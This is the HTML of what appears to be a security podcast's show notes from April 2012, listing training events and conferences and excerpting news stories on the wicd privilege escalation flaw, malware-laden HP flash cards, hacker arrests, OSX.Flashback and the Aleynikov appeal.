	Where: Courtyard Seattle Federal Way, WA</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> <br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=28014</span></a><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Bristol, UK</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Inside and Out of the Social-Engineer Toolkit (SET)<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21 &#8211; 22, 2012<br class="kix-line-break" /><br />
	When: July 23 &#8211; 24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas<br class="kix-line-break" /><br />
	</span><a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012<br class="kix-line-break" /><br />
	Where: Louisville, KY<br class="kix-line-break" /><br />
	</span><a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Skydogcon</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><br class="kix-line-break" /><br />
	When: October 26-28<br class="kix-line-break" /><br />
	Where: Hotel Preston in Nashville, TN <br class="kix-line-break" /><br />
	</span><a href="http://www.skydogcon.com/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.skydogcon.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;">&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://threatpost.com/en_us/blogs/critical-flaw-found-security-pros-favorite-backtrack-linux-041112"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://threatpost.com/en_us/blogs/critical-flaw-found-security-pros-favorite-backtrack-linux-041112</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A critical security flaw has been identified in the latest version of the wicd that is found in many Linux distributions including BackTrack R2.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The previously undiscovered privilege escalation hole was disclosed in a post on the Web site of the Infosec Institute. It was discovered by a student taking part in an InfoSec Instutite Ethical Hacking class,</span><a href="http://www.infosecinstitute.com/courses/ethical_hacking_training.html"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">according to the post</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;The student in our ethical hacking class that found the 0day was using backtrack and decided to fuzz the program, as well as look through the source code,&quot; wrote Jack Koziol, the Security Program Manager at the InfoSec Institute. &quot;He found that he could overwrite config settings and gain a root shell.&quot;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The security flaw was discovered in a component known as the Wireless Interface Connection Daemon (or WICD). The latest version of Backtrack wicd does a poor job &quot;sanitizing&quot; (or filtering) inputs to the WICD DBUS (Desktop Bus) interface &#8211; a component that allows different applications to communicate with each other. That means that attackers can push invalid configuration options to DBUS, which are then written to a WICD wireless settings configuration file. The improper settings could include scripts or executables that would be run when certain events occur &#8211; such as the user connecting to a wireless network, according to the post, whose author asked to remain anonymous.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The wicd team has released a</span><a href="https://launchpad.net/wicd/+announcement/9888"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">new version</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> that fixes this bug (CVE-2012-2095). The title of this advisory upon release was &quot;</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">wicd Privilege Escalation 0Day Tested against Backtrack 5, 5 R2, Arch distributions</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;. Unfortunately, when the InfoSec Institute tweeted and emailed to mailing lists the notifications of this vulnerability, they incorrectly shortened the title and called it &quot;</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Backtrack 5 R2 priv escalation 0day</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &quot;, which was quite misleading and lead people to believe the bug was actually in Backtrack R2. The bug actually resided in wicd and not in any Backtrack team written code.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.theregister.co.uk/2012/04/11/hp_ships_malware_cards_with_switches_oops"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theregister.co.uk/2012/04/11/hp_ships_malware_cards_with_switches_oops</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">HP has sent out a</span><a href="http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03249176"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">warning</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> to customers after the vendor found out it had inadvertently been shipping virus-laden compact flash cards with its networking kit.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The unnamed malware appeared on flash cards that came bundled with HP ProCurve 5400zl switches. The flash card wouldn&#39;t do anything on the switch itself but &quot;reuse of an infected compact flash card in a personal computer could result in a compromise of that system&#39;s integrity,&quot; HP warned in a bulletin issued on Tuesday.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;There is an irony that a major selling point of the ProCurve switches is its virus-throttling capability,&quot; notes </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Reg</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> reader Kevin L, one of a number of readers who told us about the HP snafu. &quot;Pity they couldn&#39;t throttle it in manufacture,&quot; he added.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It&#39;s unclear how the unknown malware got onto the Flash cards that come bundled with the 10 Gbps-capable line of LAN switches, but an infected computer somewhere in the manufacturing process &ndash; possible in a factory run by a third-party supplier &ndash; is the most obvious suspect.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">These kind of problems are rare but not unprecedented and really only cause significant problems when a particular aggressively spreading or destructive strain of malware is involved, as was the case when the FunLove virus infected machines in a Dell factory a few years back in 1999. HP is not unacquainted with this type of problem. HP distributed printer drivers corrupted by FunLove after malware-ladened files were uploaded to its website back in 2001.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.theage.com.au/technology/technology-news/hacking-cases-body-of-evidence-20120411-1wsbh.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theage.com.au/technology/technology-news/hacking-cases-body-of-evidence-20120411-1wsbh.html</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Pictures of a scantily clad woman taken in an outer-Melbourne suburb have led to the arrest of a man who allegedly hacked law enforcement and government websites in the United States.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Texan Higinio O. Ochoa III has been charged by the FBI with hacking into the websites of at least four US law enforcement websites and releasing the home addresses, home telephone numbers and mobile phone numbers of dozens of police officers.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But it was a headless photo of a bikini-clad woman in Wantirna South holding a message taunting US authorities that confirmed Ochoa&#39;s identity, according to an affidavit filed by the FBI.</span><img height="222px;" src="https://lh5.googleusercontent.com/DqwOoSlgoPxXKvbX3TD8wOzlwZCyPwsXUa31wfTGFbUrVnaLk6R89DhbhWV7YdQwfcfVbZrFivyxGgFaBFYBUv8ijsRAmB6gZ0ql4GpfO7uGMc9Jo-c" width="200px;" /></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The affidavit, filed in a Texas court last month, alleges that Ochoa is a member of &#39;&#39;CabinCr3w&#39;&#39;, an offshoot of the hacking collective Anonymous.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It says that in February a Twitter account with the name @AnonW0rmer, alleged to be Ochoa&#39;s, pointed followers to a website where the information lifted from the law enforcement websites was displayed.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.huffingtonpost.co.uk/2012/04/12/mi6-phone-hack-trick-teampoison_n_1420264.html?ref=uk-tech"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.huffingtonpost.co.uk/2012/04/12/mi6-phone-hack-trick-teampoison_n_1420264.html?ref=uk-tech</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The leader of the hacking group TeamPoison (&#39;TeaMp0isoN&#39;) is a pretty old hand when it comes to carving up government security systems.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">He is, he says, 17 years old.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Known as Trick (or, more correctly, &#39;TriCk&#39;), his group has hacked the United Nations, Nato, Facebook, the English Defence League, a personal email account linked to a former staff member of Tony Blair and other major organisations and governments.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">They say they are behind the alleged &#39;phonebomb&#39; attack in which MI6&#39;s anti-terrorism hotline was reportedly blocked for more than 24 hours, and several of their internal phone discussions were recorded and leaked to YouTube.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The attack has been</span><a href="http://news.sky.com/home/uk-news/article/16207313"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">described as a potentially &quot;catastrophic&quot; break-in by some security experts</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But Trick, who refused to reveal his real name, laughs off the idea it was difficult.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;It wasn&#39;t a hard hack at all,&quot; he said in an exclusive interview with the Huffington Post UK.&nbsp;&nbsp;&nbsp; </span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;It was actually easy, you just have to learn how phone systems work and learn the art of phreaking, which most so-called hackers these days don&#39;t even read about. Nor do they even know what phreaking is, except for the underground that is,&quot; he said via Skype.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.symantec.com/connect/blogs/osxflashbackk-suffering-slashback-infections-down-270000"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.symantec.com/connect/blogs/osxflashbackk-suffering-slashback-infections-down-270000</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">OSX.Flashback initially arrived on the scene in late 2011. It has come a long way from its humble beginnings as a social-engineering scam trying to pass off as a fake Flash update using digital certificates purporting to come from Apple. Flashback is now leveraging the latest Java vulnerability (BID 52161 &#8211; </span><a href="http://www.securityfocus.com/bid/52161"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Oracle Java SE Remote Java Runtime Environment Denial Of Service Vulnerability</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> ) in order to deliver its payload. This latest attack wave is testament to how criminal elements can take advantage of un-patched vulnerabilities in order to install their wares on a large scale.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Malware authors have targeted the Mac OS for quite some time; however, the recent OSX.Flashback.K infections indicate a very significant shift to the current threat landscape, which is dominated by malware on the Windows operating system. What sets this threat apart from typical Mac Trojans is the sheer size of Mac computers that have been infected. Initial estimates </span><a href="http://news.drweb.com/show/?i=2341&amp;lng=en"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">according to Dr. Web</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> report OSXFlashback.K infections to be in the region of 550,000.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://arstechnica.com/tech-policy/news/2012/04/a-federal-appeals-court-has-2.ars"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://arstechnica.com/tech-policy/news/2012/04/a-federal-appeals-court-has-2.ars</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A federal appeals court has thrown out the conviction of a former Goldman Sachs programmer who stole source code from the firm&#39;s high-frequency trading (HFT) system. The court holds that the defendant&#39;s actions did not fit the definitions of the federal crimes for which he had been convicted. &quot;We decline to stretch or update statutory words of plain and ordinary meaning in order to better accommodate the digital age,&quot; the court wrote.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Sergey Aleynikov was a top programmer for Goldman Sachs until he left in 2009 to work for a start-up firm planning to build a competing high-frequency trading system. Just before he left, he uploaded a copy of Goldman&#39;s HFT code to a remote server. He later downloaded the files to his home computer, but his actions were discovered and he was arrested by the FBI a few weeks later.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Aleynikov was indicted under two federal statutes, the National Stolen Property Act (NSPA) and the Economic Espionage Act (EEA). He was convicted by a lower court in 2010, but the United States Court of Appeals for the Second Circuit overturned his indictment, releasing its opinion on Wednesday.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The NSPA makes it a crime to &ldquo;transport, transmit, transfer in interstate or foreign commerce any goods, wares, merchandise, securities, or money.&quot; The government argued, and the lower court agreed, that the source code met the definition of &quot;goods, wares,&quot; and &quot;merchandise.&quot; But the Second Circuit reached the opposite conclusion, ruling that these terms only include tangible objects.</span></p>
